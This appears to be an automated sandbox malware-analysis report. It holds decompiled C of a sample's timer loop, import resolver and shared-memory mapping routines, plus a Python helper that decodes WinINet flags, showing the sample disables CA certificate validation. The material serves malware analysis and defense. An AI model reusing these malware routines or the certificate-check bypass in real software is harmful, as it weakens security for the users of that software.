                                                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                                    • String ID: @MqtNqt
                                                    • API String ID: 2290446683-2883916605
                                                    • Opcode ID: b8b742b29e420729795d4906dc8682931244d4693381feb1db155e37b0e01f22
                                                    • Instruction ID: c76805e47aaf7052e0c3f4852c5e741aca4e5a249936abd0ca9b4a03d13023a9
                                                    • Opcode Fuzzy Hash: b8b742b29e420729795d4906dc8682931244d4693381feb1db155e37b0e01f22
                                                    • Instruction Fuzzy Hash: D7419DB2600204BFDB319FA5DC68EAB7BFCFB84744B100928F283D2091E636A540DF20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
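E01097AC4 is the request setup: InternetOpenA with 0x10000000 (INTERNET_FLAG_ASYNC), InternetConnectA to port 0x50 with service type 3 (HTTP), HttpOpenRequestA with 0x84404000, an InternetSetOptionA on option 0x1f that ORs 0x100 into the current value, and 0xea60 ms send and receive timeouts. Reading those bitmasks by hand is error-prone, so the Python below, an added example written for this page and not code from the report or from the sample, decodes them against the wininet.h values and records what an analyst needs from them: plaintext HTTP on port 80, HTTP-to-HTTPS redirects followed transparently, and SECURITY_FLAG_IGNORE_UNKNOWN_CA switching off CA validation should the connection land on TLS. The flag tables contain only the constants needed here; any other bit is reported as unknown rather than named.

```python
from typing import Dict, List, Tuple

# Subset of wininet.h constants needed to read E01097AC4 (values from the public header).
# Flags not listed here are reported as unknown bits instead of being guessed.
REQUEST_FLAGS: Dict[int, str] = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# Bits of the INTERNET_OPTION_SECURITY_FLAGS (option 31) value.
SECURITY_FLAGS: Dict[int, str] = {
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000001: "SECURITY_FLAG_SECURE",
}
INTERNET_OPTIONS: Dict[int, str] = {
    2: "INTERNET_OPTION_CONNECT_TIMEOUT",
    5: "INTERNET_OPTION_SEND_TIMEOUT",
    6: "INTERNET_OPTION_RECEIVE_TIMEOUT",
    31: "INTERNET_OPTION_SECURITY_FLAGS",
}


def decode_flags(value: int, table: Dict[int, str]) -> Tuple[List[str], int]:
    """Split a bitmask into known flag names (highest bit first) and the leftover unknown bits."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    known = 0
    for bit in table:
        if value & bit:
            known |= bit
    return names, (value & ~known) & 0xFFFFFFFF


def tls_checks_disabled(security_flags: int) -> List[str]:
    """Names of the SECURITY_FLAG_IGNORE_* bits set, i.e. certificate checks the caller opted out of."""
    names, _ = decode_flags(security_flags, SECURITY_FLAGS)
    return [n for n in names if n.startswith("SECURITY_FLAG_IGNORE_")]


def summarize_request_setup(open_flags: int, connect_port: int, request_flags: int,
                            security_flags_added: int, options_set: Dict[int, int]) -> Dict[str, object]:
    """Turn the raw constants of one InternetOpen / InternetConnect / HttpOpenRequest /
    InternetSetOption sequence into the facts an analyst records about it."""
    req_names, req_unknown = decode_flags(request_flags, REQUEST_FLAGS)
    open_names, _ = decode_flags(open_flags, REQUEST_FLAGS)
    return {
        "async": "INTERNET_FLAG_ASYNC" in open_names,
        "scheme": "https" if "INTERNET_FLAG_SECURE" in req_names else "http",
        "port": connect_port,
        "request_flags": req_names,
        "unknown_request_bits": req_unknown,
        # With IGNORE_REDIRECT_TO_HTTPS set, WinINet follows an HTTP->HTTPS redirect transparently,
        # so the security flags matter even for a request that starts on port 80.
        "http_to_https_redirect_transparent": "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS" in req_names,
        "tls_checks_disabled": tls_checks_disabled(security_flags_added),
        "options": {INTERNET_OPTIONS.get(opt, f"INTERNET_OPTION_{opt}"): val
                    for opt, val in options_set.items()},
    }


# The constants as they appear in the E01097AC4 listing above (copied from it, not inferred).
OBSERVED = dict(
    open_flags=0x10000000,               # InternetOpenA(_a4, 0, 0, 0, 0x10000000)
    connect_port=0x50,                   # InternetConnectA(..., 0x50, 0, 0, 3, 0, _t65)
    request_flags=0x84404000,            # HttpOpenRequestA(..., 0x84404000, _t65)
    security_flags_added=0x00000100,     # _v8 = _v8 | 0x00000100; InternetSetOptionA(..., 0x1f, &_v8, 4)
    options_set={6: 0xEA60, 5: 0xEA60},  # InternetSetOptionA(..., 6 / 5, &_v16, 4) with _v16 = 0xea60
)

if __name__ == "__main__":
    for key, val in summarize_request_setup(**OBSERVED).items():
        print(f"{key}: {val}")
```

Run stand-alone it prints the decoded summary for the constants above; in a triage pipeline the same function would be fed constants pulled from each HttpOpenRequestA / InternetSetOptionA call site, and a non-zero `unknown_request_bits` is the signal to go back to the header rather than trust the table.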

                                                    Control-flow Graph

                                                    control_flow_graph 147 10948d3-1094905 memset CreateWaitableTimerA 148 109490b-1094964 _allmul SetWaitableTimer WaitForMultipleObjects 147->148 149 1094a86-1094a8c 147->149 150 109496a-109496d 148->150 151 10949ee-10949f4 148->151 156 1094a90-1094a9a 149->156 153 1094978 150->153 154 109496f call 1095e69 150->154 155 10949f5-10949f9 151->155 160 1094982 153->160 161 1094974-1094976 154->161 158 1094a09-1094a0d 155->158 159 10949fb-10949fd 155->159 158->155 162 1094a0f-1094a19 CloseHandle 158->162 159->158 163 1094986-109498b 160->163 161->153 161->160 162->156 164 109498d-1094994 163->164 165 109499e-10949cb call 1093afc 163->165 164->165 166 1094996 164->166 169 1094a1b-1094a20 165->169 170 10949cd-10949d8 165->170 166->165 172 1094a3f-1094a47 169->172 173 1094a22-1094a28 169->173 170->163 171 10949da-10949ea call 109290f 170->171 171->151 174 1094a4d-1094a7b _allmul SetWaitableTimer WaitForMultipleObjects 172->174 173->151 176 1094a2a-1094a3d call 1091103 173->176 174->163 177 1094a81 174->177 176->174 177->151
                                                    C-Code - Quality: 83%
                                                    			E010948D3(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                    				void _v48;
                                                    				long _v52;
                                                    				struct %anon52 _v60;
                                                    				char _v72;
                                                    				long _v76;
                                                    				void* _v80;
                                                    				union _LARGE_INTEGER _v84;
                                                    				struct %anon52 _v92;
                                                    				void* _v96;
                                                    				void* _v100;
                                                    				union _LARGE_INTEGER _v104;
                                                    				long _v108;
                                                    				struct %anon52 _v124;
                                                    				long _v128;
                                                    				struct %anon52 _t46;
                                                    				void* _t51;
                                                    				long _t53;
                                                    				void* _t54;
                                                    				struct %anon52 _t61;
                                                    				long _t65;
                                                    				struct %anon52 _t66;
                                                    				void* _t69;
                                                    				void* _t73;
                                                    				signed int _t74;
                                                    				void* _t76;
                                                    				void* _t78;
                                                    				void** _t82;
                                                    				signed int _t86;
                                                    				void* _t89;
                                                    
                                                    				_t76 = __edx;
                                                    				_v52 = 0;
                                                    				memset( &_v48, 0, 0x2c);
                                                    				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                    				_v60 = _t46;
                                                    				if(_t46 == 0) {
                                                    					_v92.HighPart = GetLastError();
                                                    				} else {
                                                    					_push(0xffffffff);
                                                    					_push(0xff676980);
                                                    					_push(0);
                                                    					_push( *0x109a2e0);
                                                    					_v76 = 0;
                                                    					_v80 = 0;
                                                    					L0109821A();
                                                    					_v84.LowPart = _t46;
                                                    					_v80 = _t76;
                                                    					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                                    					_t51 =  *0x109a30c; // 0x16c
                                                    					_v76 = _t51;
                                                    					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                                    					_v108 = _t53;
                                                    					if(_t53 == 0) {
                                                    						if(_a8 != 0) {
                                                    							L4:
                                                    							 *0x109a2ec = 5;
                                                    						} else {
                                                    							_t69 = E01095E69(_t76); // executed
                                                    							if(_t69 != 0) {
                                                    								goto L4;
                                                    							}
                                                    						}
                                                    						_v104.LowPart = 0;
                                                    						L6:
                                                    						if(_v104.LowPart == 1 && ( *0x109a300 & 0x00000001) == 0) {
                                                    							_v104.LowPart = 2;
                                                    						}
                                                    						_t74 = _v104.LowPart;
                                                    						_t58 = _t74 << 4;
                                                    						_t78 = _t89 + (_t74 << 4) + 0x38;
                                                    						_t75 = _t74 + 1;
                                                    						_v92.LowPart = _t74 + 1;
                                                    						_t61 = E01093AFC( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                                    						_v124 = _t61;
                                                    						if(_t61 != 0) {
                                                    							goto L17;
                                                    						}
                                                    						_t66 = _v92;
                                                    						_v104.LowPart = _t66;
                                                    						if(_t66 != 3) {
                                                    							goto L6;
                                                    						} else {
                                                    							_v124.HighPart = E0109290F(_t75,  &_v72, _a4, _a8);
                                                    						}
                                                    						goto L12;
                                                    						L17:
                                                    						__eflags = _t61 - 0x10d2;
                                                    						if(_t61 != 0x10d2) {
                                                    							_push(0xffffffff);
                                                    							_push(0xff676980);
                                                    							_push(0);
                                                    							_push( *0x109a2e4);
                                                    							goto L21;
                                                    						} else {
                                                    							__eflags =  *0x109a2e8; // 0x0
                                                    							if(__eflags == 0) {
                                                    								goto L12;
                                                    							} else {
                                                    								_t61 = E01091103();
                                                    								_push(0xffffffff);
                                                    								_push(0xdc3cba00);
                                                    								_push(0);
                                                    								_push( *0x109a2e8);
                                                    								L21:
                                                    								L0109821A();
                                                    								_v104.LowPart = _t61;
                                                    								_v100 = _t78;
                                                    								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                                    								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                                    								_v128 = _t65;
                                                    								__eflags = _t65;
                                                    								if(_t65 == 0) {
                                                    									goto L6;
                                                    								} else {
                                                    									goto L12;
                                                    								}
                                                    							}
                                                    						}
                                                    						L25:
                                                    					}
                                                    					L12:
                                                    					_t82 =  &_v72;
                                                    					_t73 = 3;
                                                    					do {
                                                    						_t54 =  *_t82;
                                                    						if(_t54 != 0) {
                                                    							HeapFree( *0x109a2d8, 0, _t54);
                                                    						}
                                                    						_t82 =  &(_t82[4]);
                                                    						_t73 = _t73 - 1;
                                                    					} while (_t73 != 0);
                                                    					CloseHandle(_v80);
                                                    				}
                                                    				return _v92.HighPart;
                                                    				goto L25;
                                                    			}

                                                    APIs
                                                    • memset.NTDLL ref: 010948ED
                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 010948F9
                                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01094921
                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01094941
                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01091E4E,?), ref: 0109495C
                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01091E4E,?,00000000), ref: 01094A03
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01091E4E,?,00000000,?,?), ref: 01094A13
                                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01094A4D
                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 01094A67
                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01094A73
                                                      • Part of subcall function 01095E69: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01B093D8,00000000,?,7476F710,00000000,7476F730), ref: 01095EB8
                                                      • Part of subcall function 01095E69: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01B09410,?,00000000,30314549,00000014,004F0053,01B093CC), ref: 01095F55
                                                      • Part of subcall function 01095E69: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01094974), ref: 01095F67
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01091E4E,?,00000000,?,?), ref: 01094A86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                    • String ID: Uqt$@MqtNqt
                                                    • API String ID: 3521023985-3266969629
                                                    • Opcode ID: 326577785a4958783acbcc1413fbb964af2d2ccc6027258ad71effcd771b6ebd
                                                    • Instruction ID: b70ab0b3c210c635d382dd2c1ca0f2dfd10f1e534214dc02aa605d8ea2904090
                                                    • Opcode Fuzzy Hash: 326577785a4958783acbcc1413fbb964af2d2ccc6027258ad71effcd771b6ebd
                                                    • Instruction Fuzzy Hash: 54519D71008320AFDB21EF199C54D9BBBE8FB89324F108A1EF4E4C2290D7768505DF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 181 1097f05-1097f6a 182 1097f8b-1097fb5 181->182 183 1097f6c-1097f86 RaiseException 181->183 185 1097fba-1097fc6 182->185 186 1097fb7 182->186 184 109813b-109813f 183->184 187 1097fd9-1097fdb 185->187 188 1097fc8-1097fd3 185->188 186->185 189 1097fe1-1097fe8 187->189 190 1098083-109808d 187->190 188->187 196 109811e-1098125 188->196 192 1097ff8-1098005 LoadLibraryA 189->192 193 1097fea-1097ff6 189->193 194 1098099-109809b 190->194 195 109808f-1098097 190->195 197 1098048-1098054 InterlockedExchange 192->197 198 1098007-1098017 192->198 193->192 193->197 199 1098119-109811c 194->199 200 109809d-10980a0 194->200 195->194 207 1098139 196->207 208 1098127-1098134 196->208 201 109807c-109807d FreeLibrary 197->201 202 1098056-109805a 197->202 214 1098019-1098025 198->214 215 1098027-1098043 RaiseException 198->215 199->196 205 10980ce-10980dc 200->205 206 10980a2-10980a5 200->206 201->190 202->190 209 109805c-1098068 LocalAlloc 202->209 205->199 217 10980de-10980ee 205->217 206->205 211 10980a7-10980b2 206->211 207->184 208->207 209->190 213 109806a-109807a 209->213 211->205 216 10980b4-10980ba 211->216 213->190 214->197 214->215 215->184 216->205 218 10980bc-10980bf 216->218 222 10980fa-10980fc 217->222 223 10980f0-10980f8 217->223 218->205 220 10980c1-10980cc 218->220 220->199 220->205 222->199 224 10980fe-1098116 RaiseException 222->224 223->222 224->199
                                                    C-Code - Quality: 51%
                                                    			E01097F05(long _a4, long _a8) {
                                                    				signed int _v8;
                                                    				intOrPtr _v16;
                                                    				LONG* _v28;
                                                    				long _v40;
                                                    				long _v44;
                                                    				long _v48;
                                                    				CHAR* _v52;
                                                    				long _v56;
                                                    				CHAR* _v60;
                                                    				long _v64;
                                                    				signed int* _v68;
                                                    				char _v72;
                                                    				signed int _t76;
                                                    				signed int _t80;
                                                    				signed int _t81;
                                                    				intOrPtr* _t82;
                                                    				intOrPtr* _t83;
                                                    				intOrPtr* _t85;
                                                    				intOrPtr* _t90;
                                                    				intOrPtr* _t95;
                                                    				intOrPtr* _t98;
                                                    				struct HINSTANCE__* _t99;
                                                    				void* _t102;
                                                    				intOrPtr* _t104;
                                                    				void* _t115;
                                                    				long _t116;
                                                    				void _t125;
                                                    				void* _t131;
                                                    				signed short _t133;
                                                    				struct HINSTANCE__* _t138;
                                                    				signed int* _t139;
                                                    
                                                    				_t139 = _a4;
                                                    				_v28 = _t139[2] + 0x1090000;
                                                    				_t115 = _t139[3] + 0x1090000;
                                                    				_t131 = _t139[4] + 0x1090000;
                                                    				_v8 = _t139[7];
                                                    				_v60 = _t139[1] + 0x1090000;
                                                    				_v16 = _t139[5] + 0x1090000;
                                                    				_v64 = _a8;
                                                    				_v72 = 0x24;
                                                    				_v68 = _t139;
                                                    				_v56 = 0;
                                                    				asm("stosd");
                                                    				_v48 = 0;
                                                    				_v44 = 0;
                                                    				_v40 = 0;
                                                    				if(( *_t139 & 0x00000001) == 0) {
                                                    					_a8 =  &_v72;
                                                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                    					return 0;
                                                    				}
                                                    				_t138 =  *_v28;
                                                    				_t76 = _a8 - _t115 >> 2 << 2;
                                                    				_t133 =  *(_t131 + _t76);
                                                    				_a4 = _t76;
                                                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                    				_v56 = _t80;
                                                    				_t81 = _t133 + 0x1090002;
                                                    				if(_t80 == 0) {
                                                    					_t81 = _t133 & 0x0000ffff;
                                                    				}
                                                    				_v52 = _t81;
                                                    				_t82 =  *0x109a1c0; // 0x0
                                                    				_t116 = 0;
                                                    				if(_t82 == 0) {
                                                    					L6:
                                                    					if(_t138 != 0) {
                                                    						L18:
                                                    						_t83 =  *0x109a1c0; // 0x0
                                                    						_v48 = _t138;
                                                    						if(_t83 != 0) {
                                                    							_t116 =  *_t83(2,  &_v72);
                                                    						}
                                                    						if(_t116 != 0) {
                                                    							L32:
                                                    							 *_a8 = _t116;
                                                    							L33:
                                                    							_t85 =  *0x109a1c0; // 0x0
                                                    							if(_t85 != 0) {
                                                    								_v40 = _v40 & 0x00000000;
                                                    								_v48 = _t138;
                                                    								_v44 = _t116;
                                                    								 *_t85(5,  &_v72);
                                                    							}
                                                    							return _t116;
                                                    						} else {
                                                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                    								L27:
                                                    								_t116 = GetProcAddress(_t138, _v52);
                                                    								if(_t116 == 0) {
                                                    									_v40 = GetLastError();
                                                    									_t90 =  *0x109a1bc; // 0x0
                                                    									if(_t90 != 0) {
                                                    										_t116 =  *_t90(4,  &_v72);
                                                    									}
                                                    									if(_t116 == 0) {
                                                    										_a4 =  &_v72;
                                                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                    										_t116 = _v44;
                                                    									}
                                                    								}
                                                    								goto L32;
                                                    							} else {
                                                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                    									_t116 =  *(_a4 + _v16);
                                                    									if(_t116 != 0) {
                                                    										goto L32;
                                                    									}
                                                    								}
                                                    								goto L27;
                                                    							}
                                                    						}
                                                    					}
                                                    					_t98 =  *0x109a1c0; // 0x0
                                                    					if(_t98 == 0) {
                                                    						L9:
                                                    						_t99 = LoadLibraryA(_v60); // executed
                                                    						_t138 = _t99;
                                                    						if(_t138 != 0) {
                                                    							L13:
                                                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                    								FreeLibrary(_t138);
                                                    							} else {
                                                    								if(_t139[6] != 0) {
                                                    									_t102 = LocalAlloc(0x40, 8);
                                                    									if(_t102 != 0) {
                                                    										 *(_t102 + 4) = _t139;
                                                    										_t125 =  *0x109a1b8; // 0x0
                                                    										 *_t102 = _t125;
                                                    										 *0x109a1b8 = _t102;
                                                    									}
                                                    								}
                                                    							}
                                                    							goto L18;
                                                    						}
                                                    						_v40 = GetLastError();
                                                    						_t104 =  *0x109a1bc; // 0x0
                                                    						if(_t104 == 0) {
                                                    							L12:
                                                    							_a8 =  &_v72;
                                                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                    							return _v44;
                                                    						}
                                                    						_t138 =  *_t104(3,  &_v72);
                                                    						if(_t138 != 0) {
                                                    							goto L13;
                                                    						}
                                                    						goto L12;
                                                    					}
                                                    					_t138 =  *_t98(1,  &_v72);
                                                    					if(_t138 != 0) {
                                                    						goto L13;
                                                    					}
                                                    					goto L9;
                                                    				}
                                                    				_t116 =  *_t82(0,  &_v72);
                                                    				if(_t116 != 0) {
                                                    					goto L33;
                                                    				}
                                                    				goto L6;
                                                    			}

                                                    APIs
                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01097F7E
                                                    • LoadLibraryA.KERNELBASE(?), ref: 01097FFB
                                                    • GetLastError.KERNEL32 ref: 01098007
                                                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0109803A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                    • String ID: $$@MqtNqt
                                                    • API String ID: 948315288-516465142
                                                    • Opcode ID: a57ee76099287f9c78b654e0aa09548012a15283e1515c400424943081e9396f
                                                    • Instruction ID: a856b9e1774715b87000cb5a86aab7f22a1c92f201c4a979fa1308e8554cee9b
                                                    • Opcode Fuzzy Hash: a57ee76099287f9c78b654e0aa09548012a15283e1515c400424943081e9396f
                                                    • Instruction Fuzzy Hash: AF814BB1A002099FDF61CF98C8A4AADBBF4FB88310F14802AF695E7340E775E945DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 74%
                                                    			E010974C4(intOrPtr __edx, void** _a4, void** _a8) {
                                                    				intOrPtr _v8;
                                                    				struct _FILETIME* _v12;
                                                    				short _v56;
                                                    				struct _FILETIME* _t12;
                                                    				intOrPtr _t13;
                                                    				void* _t17;
                                                    				void* _t21;
                                                    				intOrPtr _t27;
                                                    				long _t28;
                                                    				void* _t30;
                                                    
                                                    				_t27 = __edx;
                                                    				_t12 =  &_v12;
                                                    				GetSystemTimeAsFileTime(_t12);
                                                    				_push(0x192);
                                                    				_push(0x54d38000);
                                                    				_push(_v8);
                                                    				_push(_v12);
                                                    				L01098214();
                                                    				_push(_t12);
                                                    				_v12 = _t12;
                                                    				_t13 =  *0x109a348; // 0xa6d5a8
                                                    				_t5 = _t13 + 0x109b87a; // 0x1b08e22
                                                    				_t6 = _t13 + 0x109b594; // 0x530025
                                                    				_push(0x16);
                                                    				_push( &_v56);
                                                    				_v8 = _t27;
                                                    				L01097E7A();
                                                    				_t17 = CreateFileMappingW(0xffffffff, 0x109a34c, 4, 0, 0x1000,  &_v56); // executed
                                                    				_t30 = _t17;
                                                    				if(_t30 == 0) {
                                                    					_t28 = GetLastError();
                                                    				} else {
                                                    					if(GetLastError() == 0xb7) {
                                                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                    						if(_t21 == 0) {
                                                    							_t28 = GetLastError();
                                                    							if(_t28 != 0) {
                                                    								goto L6;
                                                    							}
                                                    						} else {
                                                    							 *_a4 = _t30;
                                                    							 *_a8 = _t21;
                                                    							_t28 = 0;
                                                    						}
                                                    					} else {
                                                    						_t28 = 2;
                                                    						L6:
                                                    						CloseHandle(_t30);
                                                    					}
                                                    				}
                                                    				return _t28;
                                                    			}

                                                    APIs
                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53,?,?), ref: 010974D0
                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010974E6
                                                    • _snwprintf.NTDLL ref: 0109750B
                                                    • CreateFileMappingW.KERNELBASE(000000FF,0109A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 01097527
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53,?), ref: 01097539
                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01097550
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53), ref: 01097571
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53,?), ref: 01097579
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                    • String ID: @MqtNqt
                                                    • API String ID: 1814172918-2883916605
                                                    • Opcode ID: 8ada7d3a009a7505b82ea3e832b0198841bd870de973a8cc9e31353d2dcf62d1
                                                    • Instruction ID: cb092e831202fd76b90a5582c0675bbc4acdcd3a4b33e87a6689ae2de431bd7a
                                                    • Opcode Fuzzy Hash: 8ada7d3a009a7505b82ea3e832b0198841bd870de973a8cc9e31353d2dcf62d1
                                                    • Instruction Fuzzy Hash: 18210572A00204BFDB619B68DC25FDE3BB9BB88714F204025F699E7290DAB19904DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 69%
                                                    			E0040189C(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                    				intOrPtr _v12;
                                                    				struct _FILETIME* _v16;
                                                    				short _v60;
                                                    				struct _FILETIME* _t14;
                                                    				intOrPtr _t15;
                                                    				long _t18;
                                                    				void* _t19;
                                                    				void* _t22;
                                                    				intOrPtr _t31;
                                                    				long _t32;
                                                    				void* _t34;
                                                    
                                                    				_t31 = __edx;
                                                    				_t14 =  &_v16;
                                                    				GetSystemTimeAsFileTime(_t14);
                                                    				_push(0x192);
                                                    				_push(0x54d38000);
                                                    				_push(_v12);
                                                    				_push(_v16);
                                                    				L00401F60();
                                                    				_push(_t14);
                                                    				_v16 = _t14;
                                                    				_t15 =  *0x403184;
                                                    				_push(_t15 + 0x40405e);
                                                    				_push(_t15 + 0x404054);
                                                    				_push(0x16);
                                                    				_push( &_v60);
                                                    				_v12 = _t31;
                                                    				L00401F5A();
                                                    				_t18 = _a4;
                                                    				if(_t18 == 0) {
                                                    					_t18 = 0x1000;
                                                    				}
                                                    				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed
                                                    				_t34 = _t19;
                                                    				if(_t34 == 0) {
                                                    					_t32 = GetLastError();
                                                    				} else {
                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                    						if(_t22 == 0) {
                                                    							_t32 = GetLastError();
                                                    							if(_t32 != 0) {
                                                    								goto L9;
                                                    							}
                                                    						} else {
                                                    							 *_a8 = _t34;
                                                    							 *_a12 = _t22;
                                                    							_t32 = 0;
                                                    						}
                                                    					} else {
                                                    						_t32 = 2;
                                                    						L9:
                                                    						CloseHandle(_t34);
                                                    					}
                                                    				}
                                                    				return _t32;
                                                    			}

                                                    APIs
                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?,?), ref: 004018A9
                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 004018BF
                                                    • _snwprintf.NTDLL ref: 004018E4
                                                    • CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401909
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?), ref: 00401920
                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401934
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?), ref: 0040194C
